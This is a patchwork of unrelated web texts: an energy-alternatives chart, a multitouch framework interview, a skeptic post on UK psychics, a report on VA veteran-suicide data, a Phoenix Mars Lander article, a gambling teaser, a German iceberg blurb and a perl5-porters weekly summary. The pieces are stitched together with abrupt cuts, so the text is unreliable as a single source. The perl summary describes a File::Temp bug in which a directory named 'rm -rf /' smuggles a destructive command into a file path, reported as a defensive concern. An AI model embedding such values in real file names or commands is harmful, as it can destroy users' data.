The ultimate oil killer : Anything from sunshine to nuclear reactors can make hydrogen - the carbon emissions could be zero .
It will cost a lot in R&D money to perfect the automotive fuel cell and build a new distribution infrastructure , and the Hindenburg problem remains to be solved , but there 's nothing like triple - digit crude prices to focus the mind .
Current cost : $ 90/b.o.e. *
Environmental friendliness :
Technological maturity :
Carbon emissions :
Potential oil killer : Yes
US reserves : Unlimited
Global reserves : Unlimited
Global production 2004 : 902 million b.o.e .
PLUG -IN HYBRIDS
Tank up in your garage - 64 cents ' worth of kilowatts will take you as far as a gallon of regular .
Too bad the batteries in today 's hybrids wo n't go more than a few miles .
Extend the range to 30 miles ( cost per vehicle : $ 10,000 ) and add the ability to suck power from the grid , and you have a dual - fuel vehicle that kisses gasoline good - bye for short trips .
The electrons can come from dirty coal , clean solar , or anything in between .
Fuel cost : $ 120/b.o.e. * ( including battery )
Environmental friendliness :
Technological maturity :
Carbon emissions :
Potential oil killer : Yes
US reserves : N / A
Global reserves : N / A
Global production 2004 : N /
A
* barrel of oil equivalent
Sources : Electric Research Power Institute , Energy Information Administration , National Renewable Energy Laboratory , World Energy Council , US Geological Survey .
Feature :
>
Why $ 5 Gas Is Good for America
Plus :
>
As Prices Rise , Technologies Emerge
$ 20-$ 30
Digital Oil Fields
$ 30-$ 70
Ethanol
$ 70 and up
Oil Shale
Click to view
It 's not from Apple , but it gives a pretty good idea of what to expect from them , especially knowing that only one guy — Christian Moore — got this system running at full speed on a simple Intel - based MacBook .
His Lux free open framework enables true multitouch interaction in Mac OS X .
In fact , he says it can work under any platform and even a web browser , enabling complex user interfaces and object manipulation comparable to Jeff Han 's magic walls or the Microsoft Surface anywhere .
We talked with Moore about how it works and what to expect from it .
Jeff Han Talks Multitouch , iPhones , and Lame Minority Report Jokes Click to view Bumping into Jeff Han , a man highly obsessed with touchscreens , was a highlight of …
Read more
Advertisement
Advertisement
G/O Media may get a commission LG 75 - Inch 8K TV Buy for $ 2150 from BuyDig Use the promo code ASL250
Advertisement
Advertisement
Advertisement
Advertisement
Advertisement
Jesus Diaz :
Tell me more about Lux .
This is a framework that anybody can use , right ?
Under any platform ?
Christian Moore :
Well , yeah , is an open source framework I 've been working on for experimenting with user interfaces .
It 's more a general framework than targeting one main deployment platform .
That video is actually all AS3 running in Flash 9 ￼over Mac OS X , but you can integrate it with any development system and platform .
Advertisement
JD : Why Flash ?
CM : Because it 's fast to prototype in .
However , the software is broken into several segments .
One C++ application that tracks hands that talks to Flash ... WPF ... or another C++ app ... and basically everything you can imagine .
You can enable multitouch in any environment , like Cocoa .
JD : So anyone can grab the framework and make native multitouch apps right in Mac OS X or Windows or Linux .
CM : Yeah .
We have an Xcode - developed app for photo and paint coming , as well as a tracking application .
But using Flash for this demo was the fastest way for us at the moment .
Advertisement
JD : How many people did this ?
CM : I did the core system , but four people from the NUI Group contributed demos .
JD : What machine is running the demo in the video ?
Looks amazingly fast .
CM : Just a MacBook .
Advertisement
JD : And for the multitouch screen ?
CM : I use a ~box from naturalui .
It 's ghetto tech , I know , but I developed the majority of Lux on a cardboard box .
And it works great .
JD : Indeed , it looks like it works perfectly right .
How does this compare to frameworks like UITouch , in the iPhone ?
CM : Apple 's UITouch its very , very well designed .
It runs at the core level , while ours is more a free environment to develop on top ... to learn about multitouch and share code .
Advertisement
[ Lux and NUI Group ]
Via Reuters , a story out of the U.K. that made me very happy indeed : British “ psychics ” are protesting a new consumer - protection law which they fear will require them to offer actual proof of their alleged powers .
The law currently in force in this area is the Fraudulent Mediums
Act of 1951 , which does in fact make it illegal to fraudulently claim to possess psychic or clairvoyant powers .
But the key word is “ fraudulently ” – meaning that any enterprising prosecutor would have to prove that not only that the defendant has no psychic powers , but that they were aware of this and deliberately set out to deceive .
This is a high bar to surmount , which is why the Act has hardly ever been used to prosecute psychic claimants .
( Oddly enough , Northern Ireland is specifically exempted .
I guess fraudulent psychics working there luck out ? )
But now , as part of an effort to harmonize consumer - protection laws across the European Union , the Act may be repealed .
The new regulations proposed to replace it ban “ treating consumers unfairly ” , and psychics worry that this language could be used against them , to force them to prove their claims are genuine .
Gee , you think ?
Organizers [ of the petition drive ] say that replacing the Fraudulent Mediums
Act of 1951 with new consumer protection rules will remove key legal protection for “ genuine ” mediums .
They think skeptics might bring malicious prosecutions to force spiritualists to prove in court that they can heal people , see into the future or talk to the dead .
Excuse me – “ malicious ” prosecutions ?
How on earth would that be malicious ?
If a psychic is the real thing , surely there can be no harm in asking them to prove this in clear and convincing fashion with objective evidence .
If a psychic is phony , and the practitioner is duping the gullible with false claims , why would it be malicious to prosecute them for this ?
Any other business that uses false claims in its advertising is liable to prosecution .
Why should psychics get a special exemption from that ordinary and reasonable standard ?
Here ’s the answer that gives the game away :
“ If I ’m giving a healing to someone , I do n’t want to have to stand there and say I do n’t believe in what I ’m doing , ” said Carole McEntee - Taylor , a healer who co-founded the Spiritual Workers Association .
… ” By repealing the Act , the onus will go round the other way and we will have to prove we are genuine , ” McEntee - Taylor told Reuters .
“ No other religion has to do that . ”
No other religion has to do that .
Clearly , the psychics see themselves not as businesspeople , but as religious practitioners – and as such , they believe they should be exempt from having to present proof .
Because , of course , anything that is “ religion ” does not need to present any proof for its claims , and it is unfair to ask otherwise .
This is exactly what atheists like Sam Harris are speaking of when they refer to the corrosive , dangerous effects of faith , in that it elevates ordinary claims above the necessity of testing and criticism .
But I do agree that it would be unfair to ask psychics to offer proof of their powers while exempting other religions .
So , let ’s take this even further !
Any supernatural belief system that claims to offer tangible benefits – healing , prosperity , discerning the future – should be put to the test and have to prove that it can deliver on its claims , the same way as any other business which sells a product .
It ’s insane that anyone who makes a specific claim to be able to deliver services in exchange for money can avoid any kind of testing or scrutiny by slapping the label “ religion ” on his business .
As I wrote in “ A Call for Truth in Advertising Laws “ , many religious frauds make explicit , specific claims about what they can deliver .
Real businesses , as opposed to businesses selling superstition and pseudoscience , never get away with this .
No legitimate pharmaceutical company can claim its drugs can cure some illness unless it goes through multiple rounds of double - blind testing to prove this .
Food companies can’t claim their products can prevent heart disease unless there are well - designed studies to show it .
Why should psychics and miracle - hawkers be held to a different standard ?
Why not make faith healers and psychic surgeons go through double - blind studies that track recovery rates ?
Why not put cold - readers and mediums to the test ?
Present them with five unknown people , whom they cannot see and who do not give feedback , and ask the psychic to perform a reading for just one – then have the five separately rate that reading ’s accuracy to see if it applies well to only one of them .
Why not see if clairvoyants can read the symbols on Zener cards and check if they can do any better than the 20 % rate chance would suggest ?
The possibilities are limitless , and it ’s no wonder psychics are terrified .
Ask them to actually prove their abilities , as opposed to exploiting the gullible and credulous under poorly controlled conditions , and their whole industry would melt away .
Make no mistake , they fear a real test because they know they could not possibly pass .
And that makes it all the more imperative that we skeptics push for real tests , to demonstrate that psychic powers are a sham and a delusion , and that their claimants are enriching themselves by shamelessly preying upon and exploiting people who are eager to believe .
US congressional hearings expose stonewalling on veteran suicide data
By Naomi Spencer
9 May 2008
The House Veterans Committee on Tuesday revisited the issue of military suicides in light of a pending lawsuit against the Department of Veterans Affairs by veterans ’ rights groups .
Following the court - ordered release of internal emails regarding staggering veteran suicide rates , Department of Veterans Affairs officials were accused of “ criminal negligence . ”
At the same time , a new estimate indicates that veteran suicide deaths could exceed combat fatalities for Iraq and Afghanistan forces .
The hearing , called “ The truth about veteran suicides , ” centered on emails released last month by the federal District Court of Northern California .
The emails showed that there were an average of 12,000 annual suicide attempts by veterans within the VA system .
The emails also revealed that the VA was aware of an estimated suicide rate of 6,570 per year across the veteran population .
With regard to both figures , the emails made clear that top officials did not want the information to be made public .
The lawsuit ( Veterans for Common Sense et al. v. Peake et al. ) , brought last June by veterans groups Veterans for Common Sense and Veterans United for Truth , is seeking to force a restructuring of the veterans ’ medical system to better handle the growing numbers of seriously injured and mentally traumatized veterans .
Of particular concern to the groups are the hundreds of thousands of returning Iraq and Afghanistan veterans suffering from post - traumatic stress disorder ( PTSD ) and traumatic brain injuries ( TBI ) , who are at the greatest risk for suicide .
In November 2007 , CBS News independently arrived at an estimate of 6,256 veteran suicides in 2005 — a figure that top VA officials vociferously denied at the time .
At a December hearing before the Veterans Committee , VA Mental Health Director Iraq Katz said the CBS figure “ is not , in fact , an accurate reflection of the rates of suicide . ”
Katz testified that “ from the beginning of the war [ in 2001 ] through the end of 2005 there were 144 known suicides among these new veterans . ”
Just days after the December hearing , however , Katz confirmed in an email exchange with VA Undersecretary Michael Kussman that veterans were committing suicide at an average rate of 18 per day , in line with the CBS figures reports , adding , “ VA ’s own data demonstrate 4 - 5 suicides per day among those who receive care from us . ”
On February 13 , Katz sent an email to the department ’s communications officer with the subject line “ Not for the CBS News Interview Request . ”
Katz wrote : “ Shh !
Our suicide prevention coordinators are identifying about 1,000 suicide attempts per month among the veterans we see in our medical facilities .
Is this something we should ( carefully ) address ourselves in some sort of release before someone stumbles on it ? ”
In testimony Tuesday , VA Secretary James Peake and Katz denied a deliberate attempt to stonewall the data , and portrayed the department as fastidious in its tracking of mentally traumatized and suicidal veterans .
Peake told the panel that the “ VA has long subjected its own data , that of the Department of Defense , and data from nationally accepted statistical sources to careful and painstaking analysis to obtain the truth about veterans ’ suicide . ”
Referring to the February 13 email , Peake suggested Katz did not want to release the figures out of concern that they were not complete and could be manipulated .
“ The number of [ suicide ] attempts referenced was based on only three months worth of data , too short a time period to determine if it was reliable , ” he said .
Katz ’s “ Shh ! ” was simply poor style , Peake suggested .
“ We ’re as far from hiding information from the public as anyone I know . ”
Significantly , however , rather than questioning the accuracy of the figure of 12,000 annual suicide attempts , in his testimony Peake suggested it might be conservative .
“ I can appreciate that the number of 1,000 suicide attempts a month might be shocking , ” he said , “ but in a system as large as ours ... and consistent with the literature , we might well expect a larger number of attempts than that . ”
Democrats on the panel called for Katz ’s firing , a suggestion Peake rejected .
Committee Chair Bob Filner , a California Democrat , said Peake ’s testimony revealed “ a culture of bureaucracy . ”
“ This is a matter of life and death , and I think there was criminal negligence in the way this was handled . ”
Filner told Peake , “ The pattern is deny , deny , deny .
Then when facts seemingly come up to disagree with the denial , you cover up , cover up , cover up . ”
Arizona Democrat Harry Mitchell said that the VA refused to provide him specific information on what resources the department had devoted to suicide prevention for four months .
Indicative of stonewalling , the VA then told the congressman to file a Freedom of Information Act request .
Mitchell threatened Peake with a congressional subpoena if the VA did not provide the data by May 9 .
The Democrats are anxious to turn the debacle to their favor without questioning the source of soaring suicides and mental trauma — the brutal occupations of Iraq and Afghanistan , the funding for which congressional Democrats have continuously approved .
The most damning testimony came from Ronald Maris , the director of the Suicide Center at the University of South Carolina .
Maris served as an expert for the veterans ’ groups at the trial last month .
He told the congressional committee that the VA stonewalled the plaintiffs over documents related to suicide attempts .
“ I was given only 170 of the estimated 15,000 incident briefs and none of the root cause analyses , ” he said .
Maris also related that during a deposition , William Feeley , the VA ’s Health Care Operations deputy undersecretary , admitted that he had not read “ from cover to cover ” the VA ’s mental health program .
When asked whether there were methods for tracking troops who may be at risk for suicide , Feeley responded , “ I ’m not sure , sorry . ”
He also told the court , “ Suicide rates are not a metric we are measuring . ”
At one point , Feeley declared , “ Suicide occurs like cancer occurs . ”
Maris commented during his testimony Tuesday , “ We all have to die , but no one needs to suicide .
The VA seems to think that a certain number of vet suicide deaths are inevitable and that there is not much we can do about them . ”
According to Maris , VA documents turned over to the court state that “ 90.9 percent of the VA facilities do not have suicide case managers . ”
While there are “ suicide coordinators ” in all of the VA ’s 154 medical centers , Maris said , there are none at all in their 875 community - based outpatient clinics , most of which do not have psychiatrists on staff .
The much - touted suicide prevention hotline established by the VA , Maris said , was utilized by less than 1 percent of those veterans who committed suicides , according to documents reviewed by the court .
Pointing out the inadequacy of the VA ’s suicide screening , Maris noted that the process involves asking only two questions of veterans : “ Have you felt depressed or hopeless in the last two weeks ? ” and “ Have you thought about hurting or harming yourself in the last two weeks ? ”
If the veteran answers “ no ” to the second question , Maris said , then no further screening is conducted .
“ Asking one or two suicide questions , which could easily be denied , misunderstood , misrepresented , etc. , is not a suicide screen up to the standard of care .
Probably self - destruction is undercounted by the VA with such perfunctory screens . ”
Maris also noted that although the VA measures suicide risk factors such as depression , drug dependency , and feelings of hopelessness , the VA relies entirely on self - reporting .
“ Since hopelessness and depression are key suicide risk factors , they should be measured systematically , not by subjective self - reporting , ” he said .
“ Some vets may not even know if they are depressed , hopeless , or suicidal . ”
Separately this week , the National Institute of Mental Health director , Thomas Insel , told reporters during a meeting of the American Psychiatric Association Monday that “ suicides and psychiatric mortality ... could trump combat deaths ” from the two wars .
Insel said he based the opinion on a study published last month by the RAND Corporation think tank , which said that some 300,000 new veterans suffer from PTSD , and that 320,000 have sustained a traumatic brain injury .
The study found that only half of these soldiers sought treatment for their injuries .
For a decade , the US space program ’s mantra for Mars has been “ follow the water . ”
Now , the Phoenix Mars Lander is poised to reach out and touch it .
On Sunday , NASA ’s latest Mars mission is scheduled to touch down on the red planet , marking a turning point in the program .
Previous missions have gathered a wealth of data on water ’s role in shaping the climate and landscape of ancient Mars .
The Mars Phoenix Lander , by contrast , is looking for water ’s presence and effects today .
Water is a key ingredient for organic life .
While the lander – a chemistry lab on a platter – is not equipped to look for life directly , it is packed with hardware to scratch beneath the surface into Mars ’s version of Arctic permafrost .
One major goal : to see if this area of the planet could be a suitable habitat for simple organisms .
“ The polar regions are where we can understand recent processes , recent climate change , and potential habitability , ” says Peter Smith , a senior research scientist at the University of Arizona and the mission ’s lead investigator .
Previous missions have landed in areas carved by ancient flows and laden with water - formed rocks and minerals , he explains .
For instance , the team working with the rovers Spirit and Opportunity far to the south of the Phoenix landing site reported Friday that Spirit has uncovered deposits of virtually pure silica .
Silica forms as volcanic steam or hot water wells up through the crust .
The deposits are similar to those found in Yellowstone National Park , the team says .
On Earth , such deposits often bear fossil remains of microbes .
The results appear in Friday ’s edition of Science .
Before the Phoenix Mars Lander can tell scientists anything , though , the craft must pass through what project manager Barry Goldstein at NASA ’s Jet Propulsion Laboratory ( JPL ) in Pasadena , Calif. , calls “ seven minutes of terror . ”
Mars has proven to be an unforgiving target .
And this mission “ is no trip to grandma ’s for the weekend , ” says Ed Weiler , who heads the Space Missions Directorate for the National Aeronautics and Space Administration .
For the engineers and scientists supporting the lander here on Earth , the seven minutes of nail - biting will coincide with a complex set of small explosions , motor firings , and maneuvers the system must execute with exquisite timing to deposit the 900 - pound lander safely on the surface .
During the 14 minutes before landing , some 26 “ pyrotechnic events ” are scheduled to occur that do everything from separating Phoenix from the spacecraft that carried it through space to shedding the heat shield protecting it during its fiery plunge through the Martian atmosphere .
At one point during the descent , the lander ’s thrusters must scoot the craft sideways to try to ensure that it wo n’t get tangled up in its parachute as it touches down .
The final 40 seconds of the descent rely on a dozen small motors , each firing in pulses , to ease the lander ’s three legs onto the surface .
Then , after a 20 - minute wait for the dust to settle , the craft will deploy its solar panels .
Folks at JPL wo n’t get confirmation of that process until 90 minutes after touchdown .
With a “ panels deployed ” signal , it ’s truly high - five time .
The lander carries an array of instruments designed to , in effect , taste and smell the Martian soil , says Sam Kounaves , a Tufts University chemist and member of the science team .
A sterilized mini - backhoe will dig up soil samples near the lander to a depth of about 20 inches .
That should be deep enough to bring up water - ice that had been detected previously by Mars orbiters .
Estimates are that the soil at this spot contains from 30 to 60 percent water - ice .
Soil samples then get directed to each of two microscopes on the lander , and to eight small , use - it - once furnaces .
These furnaces can reach temperatures of up to 1,000 degrees Celsius ( 1,832 degrees Fahrenheit ) .
By measuring temperatures at which materials vaporize in the heat and analyzing the gases created , the lander ’s instruments can give scientists a bead on the compounds in the soil .
Researchers are looking in particular for organic compounds that could represent building blocks for life .
In addition , Dr. Kounaves says , he and his colleagues will be looking for inorganic compounds that could serve as food for simple organisms .
If a smorgasbord is there , “ then its more probable that life might have been there as well , ” he says .
In addition , as the scoop works its way down , researchers will analyze samples at each depth for evidence of changes in the area ’s recent climate – manifest in the presence or absence of salts among the soil ’s constituents .
And the lander hosts several cameras plus a weather station that will track local conditions throughout the 90 - day ( Martian time ) mission , during which the seasons will shift from late spring to midsummer .
Although the mission is n’t designed to hunt for life directly , its hardware is suited to an experiment that could answer a key related question : Does Mars ’s red hue come from oxidation based on inorganic chemistry , or does the oxidation have a biological origin ?
Since the days of the two Viking lander missions , which found no evidence for life at their sites , many scientists have held that inorganic compounds are responsible for oxidizing the surface .
But last year , a team led by Dirk Schulze - Makuch at Washington State University proposed that cellular life , with hydrogen peroxide as part of an organism ’s cell fluids , could also do the trick .
Hydrogen peroxide – popular as a hair bleach with the surfing set in the 1960s – is present in terrestrial organisms , such as Bombardier beetles , Dr. Schulze - Makuch explains .
Hydrogen peroxide attracts water , so creatures with a significant amount in their cellular fluids might be able to absorb water vapor out of the atmosphere , instead of requiring liquid water .
The compound might also serve as an antifreeze to help carry simple organisms through the Martian winter .
But hydrogen peroxide can break down easily , so it would need a stabilizing compound to hold it together .
And the hardware on Phoenix is up to the task of detecting it .
The detection of any one of several possible stabilizers would n’t be the smoking gun for life , he concedes .
“ But it would be strongly supportive . ”
While we ’re constantly told about how slots are based on luck , and that there is no outcome as to what the reels will reveal , there are also loads of advice tips and tricks online that we receive .
So what are we to believe , what can we actually take to heart and use to successfully play [… ]
Bunte Eisberge Spektakuläre Beobachtungen in der Antarktis
Spektakuläres Foto aus der Antarktis : Einem Meeresforscher ist ein bunter Eisberg vor die Kameralinse getrieben .
Wie genau die farbigen Streifen in den gefrorenen Riesen entstehen , stellt Forscher vor Rätsel .
This Week on perl5 - porters - 20 - 26 January 2008
From : David Landgren
Date : January 31 , 2008 14:16
Subject : This Week on perl5 - porters - 20 - 26 January 2008
Message ID : 47A2482C.3060804@landgren.net
January 31 , 2008 14:16 This Week on perl5 - porters - 20 - 26 January 2008
This Week on perl5 - porters - 20 - 26 January 2008 " Adding new lists of things [ to remember ] to a language is only a good idea if you 're making money with certification . " -- Juerd Waalboer , on why your program should n't have to plead to use new functionality .
Topics of Interest More C for Perl programmers
The " I know Perl , how to learn C " thread continued this week with a number of book and and web site references given .
The thread then veered off into a discussion of memory alignment issues , what is a word ( in computer memory parlance ) and other sundry technical arcana of great interest to C programmers .
Many people pointed out ( quite rightly ) that K&R is still a very good read .
after all these years
http://xrl.us/bevz4
Regression with autobox Alexandr Ciornii discovered that " Perl_ck_subr " lost its public status in the API somewhere between 5.8 and 5.10 .
This resulted in a compilation failure on Windows for " autobox " , the hippest module on the block .
He noted that he could provoke the same behaviour on Linux if he removed the " PERL_CORE " preprocessor definition .
Silence ensued .
and I thought autobox was n't yet core http://xrl.us/bevz8
Make Perl Y2038 safe Michael G. Schwern saw no reason why date operations involving results that pushed out beyond 2038 ( and thus wrap around the 32 time_t quantity ) should not just do The Right Thing .
No takers .
hopefully I shall be retired by then http://xrl.us/bev2a
Making perl5 crosscompilable ( or adventures in " autoconf " ) Enrico Weigelt reported that he had managed to set up an " autoconf " - based technique for building perl .
This would allow him to make it easier to cross -compile Perl .
He had managed to build the core interpreter but was stuck on how to build the standard extensions .
The porters explained that they were unlikely to move away from the current " metaconf " system , since it allows the source to build build on many non-GNU , non-POSIX hosts .
People tried to explain how the current cross-compilation mechanism works but it appears that few people have any real experience in the matter .
No " autoconf " experts were able to answer Enrico 's questions concerning how to build extensions , either .
A work in progress http://xrl.us/bev2e
Decade old regexp tainting bug ?
Nicholas Clark uncovered an ancient bug in the regexp code .
It started of with a boolean value that was able to take values other than 0 and 1 , which was a nice touch .
It turned out that it was then binary - or'ed with a bit that happened to lie way past the most significant bit of the datatype being used to hold the boolean .
Since the bit in question was to indicate that the pattern was tainted , we have a bit of a problem on our hands .
The first thing was able to see whether it was possible to construct a test case that could expose the flawed behaviour .
Rick Delaney was first past the post with a test that demonstrated the problem , and a fix that produced the correct behaviour .
Ben Morrow proposed a different test , that Abigail tweaked to show that the problem existed all the way back to 5.004 .
This was important , for the code the Nicholas found was traced back to change # 267 , committed to the repository in 1997 .
Unfortunately , the change was a jumbo patch that changed all sorts of things in the regexp engine .
ye olde bugge http://xrl.us/bev2i
http://public.activestate.com/cgi-bin/perlbrowse/p/267
Dear C gurus Nicholas Clark discovered that an innocuous change to perl .c created a " argument ' flags ' might be clobbered by `longjmp ' or `vfork ' " warning and wondered what needed to be done to the code in order to make " gcc " happy again .
Zefram and Hugo van der Sanden explained that the " flags " variable needed to be made " volatile " .
Zefram went on to explain why it was so , in sufficient detail to merit the badge of " resident C guru " .
http://xrl.us/bev2k
" Module : : Build " interim release Ken Williams wanted to integrate the changes that were required to get 5.10 out the door back into the mainline " Module : : Build " codebase .
Most of the changes are test tweaks to skip troublesome issues on VMS .
Craig Berry agreed that the VMS porters ran out of time in the run-up to 5.10 , and it would be nice to go back and tidy up the loose ends .
mopping up http://xrl.us/bev2n
Unshifting PL_curstack is a no-no ?
Nicholas Clark was up to his elbows as usual , grovelling around in pp.c and pp_hot.c , seeing if you could shift elements off " PL_curstack " .
Presumably to make things go faster .
After watching things blow up for a while , he concluded that what he wanted to do could n't be done .
not that I really understood anything http://xrl.us/bev2t
Binding operators , void context , and documentation Kaye Offer wondered why " $ foo =~ / ( bar ) / ; " in void context does not warn , but " $ foo !~ /( bar ) / ; " does .
Aristotle Pagaltzis and Rafael Garcia - Suarez did a pretty good job of explaining why thing were the way they were .
it 's a feature http://xrl.us/bev2v
Reviving the perl compiler Reini Urban announced that he had taken a look at the perl compiler that had been removed from the 5.10.0 release .
He lavished sufficient care upon it to get to compile again , although there were problems with the test suite .
Reini thought that the simple stack - based op - tree could be JITted easily into machine code and was looking at the GNU lightning library .
He wanted to know if anyone else had had a look at this approach before .
Nicholas Clark explained that overloaded or tied SVs make JITting * really * hard , and that some of the ops were so high - level that JITting them would produce copious amounts of machine instructions which in turn would make a mess of a CPU instruction cache .
Joshua ben Jore pointed to Marc Lehmann 's Faster project , that takes a Perl routine and turns it into C. http://xrl.us/bev2x
Floats to strings issue Jerry D. Hedden asked why " Configure " probes for alternatives to " sprintf " that produce identical behaviour to " sprint ( " %g " ) " , and why not just use " sprintf " and be done with it .
Andy Dougherty explained that some platforms , such as Solaris , have alternate functions available in the system C library that offer much better performance .
In such cases , " Configure " favours them over " sprintf " .
only the best http://xrl.us/bev23
Updating " Runops : : Switch " - problem testing " OP_SAY " Jim Cromie discovered that " Runops : : Switch " needed a tweak to recognise the new " say " in 5.10 and made a preliminary patch to get it to work .
Rafael upgraded the module in any event , but Jim 's patch reminded Jan Dubois that people should never link directly to the " Perl_pp_ * " routines , since they are not part of the public API .
http://xrl.us/bev25 " perl5.6.2 -e ' delete $ ENV{PATH} ' " segfault on Solaris 10 Ralf Hack provided a recipe for people to follow , should they be stuck on a modern Solaris with an old perl , and attempt to delete environment variables .
one day this might happen to * you *
http://xrl.us/bev27
Win32 precision configuration Following on from change # 33049 when warnings about loss of precision were tweaked , Nicholas Clark noticed that the win32 / config.bc file failed the Don't Repeat Yourself principle , and wondered whether it would be possible to have it generated automatically .
Steve
Hay mumbled something about keeping things in sync and having a mind to write a script to do it , but not actually having got around to doing something about it .
low itch factor
http://xrl.us/bev29 " struct context " now 12.5 % smaller than 5.10 Nicholas Clark was as pleased as Punch after pulling out an " IV " and a pointer from " struct context " .
And after thinking about it a bit more , thought of another possible restructuring to save a bit more space .
Benjamin Smith took Nicholas 's second idea and coded a patch to implement it , and in the process discovered another improvement that Nicholas missed initially .
At the end , Nicholas applied all the discovered slimming goodness to blead .
nest scopes with impunity http://xrl.us/bev3b " lc(undef ) " is not " undef " : bug or feature ?
Alberto Simões was a little surprised to learn that " lc(undef ) " returns the empty string , and does not warn when doing so .
Abigail reminded people that Perl 's " undef " is not like SQL's " null " with its capacity to turn everything it touches to " null " .
Perl will turn " undef " into zero or the empty string as appropriate and will warn when it does so , if you ask for it .
Jonathon Rockway noticed that " \L " , " \u " and the like also behaved the same way .
Michael G. Schwern bet the contents of a capture variable that " \L " and " lc " were implemented using the same underlying opcode , which was confirmed by a quick glance at toke .c.
Rafael Garcia - Suarez added some code to make things warn , along with a few regression tests as change # 33088 .
He hoped that people would bang on it and see if anything breaks .
in that case http://xrl.us/bev3d
A warning I 'd like to see David Nicol wished that a warning would be issued when map was fed a reference to an array , instead of an array .
This reminded Aristotle Pagaltzis that this was exactly the thing that Mark - Jason Dominus 's proposal a few weeks ago was designed to approach : raising a warning when a reference is directly stringified or numified .
Juerd Waalboer pointed out " map " takes a list , and an arrayref is merely a one element list .
In fact , you cannot do anything other than give a list to map .
It just might not contain what you thought it should .
http://xrl.us/bev3j
Extra stricture for hard refs in 5.12 Following on from the above thread , Aristotle then restarted the " references should not stringify " discussion , which covered more or less the same ground as it did last month .
Michael G. Schwern summed it up pretty well " there are times when you just want an object to stringify , usually for debugging purposes , and there are times when you do n't , usually for production purposes . "
At the moment , no - one knows how to reconcile these differences , although Ben Morrow revealed a clever use of " Hash : : Util : : Fieldhash " .
http://xrl.us/bev3m
Not a pad error Elsewhere in his wanderings around the codebase , Nicholas Clark caught sight of an oddity in " pp_enteriter " ( that sets up a " foreach " loop ) .
He thought that be undoing an 8 year old change by Gurusamy Sarathy , it should be possible to provoke the bug the change was designed to fix .
But , rather surprisingly , the code continued to work anyway .
Dave Mitchell 's work on lexical and closure cleanups for 5.10 turned out to simplify matters considerably which in turn allows Nicholas to chop out a certain amount of redundant checks .
unexpected bonus
http://xrl.us/bev3q
Patches of Interest Robin Barker had a look a " Devel : : DProf " and noticed a certain amount of cruft that he was able to prune , some that had been lying around since 1999 .
Applied .
all gone http://xrl.us/bev3y
http://xrl.us/bev34
http://xrl.us/bev4a
He then took a couple of stabs at making a warning about a volatile declaration go away .
Unapplied .
http://xrl.us/bev32
http://xrl.us/bev36
Steven Schubiger did some consting goodness of his own , and added a bit to util .c .
Applied .
it 's all good http://xrl.us/bev4g
Watching the smoke signals Steve Hay was busy smoking Perl this week , and both 5.8 and 5.11 were complaining during the compilation stage and falling apart in the tests .
Smoke [ 5.8.8 ] 33008 FAIL ( F ) MSWin32 WinXP /. Net SP2 ( x86/2 cpu ) http://xrl.us/bev4i
Smoke [ 5 .
11.0 ] 33018 FAIL ( F ) MSWin32 WinXP /. Net SP2 ( x86/2 cpu ) http://xrl.us/bev4k
Jarkko Hietaniemi reported a failure compiling with C++ on a Tru64 Alpha .
Steve Peters could n't find any problems when using g++ , but thankfully Solaris 's C++ compiler obligingly fell over , which allowed him to compose a first patch to get IPC :: SysV up and running again .
Jarkko followed up with an improved patch to do the same on Tru64 .
Rafael applied this , which then caused Solaris to break again , so Steve had to go back and tweak the tweak .
Smoke [ 5.11.0 ] 33016 FAIL ( XM ) OSF1 V5.1 ( EV6/4 cpu ) http://xrl.us/bev4n
New and old bugs from RT " state " variable not available ( #49522 )
Dave Mitchell worked out what the problem was with Abigail 's state variables , tracing it to a problem with the " Svf_PADSTALE " flag , which meant , in the context of state variables , that the variable had not been initialised , rather than having gone out of scope .
A few lines of code , some tests , and the job was done .
affairs of state http://xrl.us/bev4z " strict " now uses " caller " , unintended interaction with " Safe " ( #50084 ) Simon Cozens reported that he had heard from the Postgresql developers running into trouble embedding Perl in Pg .
Their simple recipe that worked in 5.8 no longer works in 5.10 , as " strict " makes use of " caller " and the latter is not in the default list of permitted operations .
Probably not a major deal , but probably something that needs to be documented .
playing it safe
http://xrl.us/bev47
Bug in regcomp code leading to panic ( #50114 ) " mls " provided a one - liner that produces a panic in 5.10 with a regular expression .
The report went as far to identify the offending code and make a suggestion as to how it might be fixed .
http://xrl.us/bev49 " enc2xs - C " scans the current directory ( #50116 ) " mls " also suggested that " enc2xs " ( part of the " Encode " distribution , to add new encodings to perl ) should not search " . " when " - C " is used .
http://xrl.us/bev5b panic : attempt to copy freed scalar ( #50142 ) Johan Vromans posted the nth bug report concerning a problem with an explicit shift of @ARGV within a subroutine .
Dave Mitchell explained that it was a long - standing bug due to the fact that items were n't reference counted on the stack , and that perl really ought to start doing the right thing .
http://xrl.us/bev5d
" File : : Temp " and unsafe shell characters ( #50146 ) Ed Avis was alarmed to discover that if you move into a directory named `rm - rf /` , ask " File : : Temp " to create a file in said directory and open the file , you can be in a lot of trouble if it 's the super - user that 's running the script .
To counter this , Ed felt that " File : : Temp " should ensure that anything it returned to client code should be filtered to strip out shellish meta-characters .
Mark Overmeer pointed out that the problem does n't exist with the 3 - arg form of " open " and that maybe the best solution was to deprecate the 2 - arg form in 5.12 .
shell game
http://xrl.us/bev5f
" - W " and spurious ' will not stay shared ' message ( #50160 ) Eric Promislow had some code that developed a tricky regexp with a " ( ??{...} ) " construct and wondered why it issued a " will not stay shared " warning .
Dave Mitchell explained that one should always use package variables with the " ??{...} " construct , at least until 5.12 at the earliest .
http://xrl.us/bev5h " pos " is much slower with " progressive match " and unicode ( #50250 ) Heinz Knutzen discovered that a simple loop involving a " pos " was about 2000 times slower in 5.10 compared with 5.8.8 .
Dave Mitchell profiled the code and discovered that " Perl_utf_length " was soaking up an inordinate number of cycles .
This led him to conclude that there was something broken in the UTF - 8 length cache code .
http://xrl.us/bev5m
Segfault on " perl -e ' split // , unpack " ( B ) * " , " ab " ' " ( #50256 ) mauke reported this crash on 5.10.0 ( and it looks like it was there in 5.8.8 as well ) .
No -one ventured a reason as to why .
http://xrl.us/bev5o
Perl5 Bug Summary 317 new + 1482 open = 1799 ( 11 created this week )
http://xrl.us/bev5q
http://rt.perl.org/rt3/NoAuth/perl5/Overview.html
This is the BBC PadWalker A recent change ( #33030 ) by Nicholas Clark broke PadWalker .
But PadWalker being what it is , no - one was really surprised .
http://xrl.us/bev3o
In Brief Jerry D. Hedden made the " installperl " target not complain about finding " perl " in the build directory .
http://xrl.us/bev3u
H.Merijn Brand reported good results with his " Configure " and metaunits work .
He was down to 16 warnings , and the promise of several files that could be removed from the branch once everything was wrapped up .
Andy Dougherty rejoiced .
and we all breathed a sigh of relief http://xrl.us/bevzs
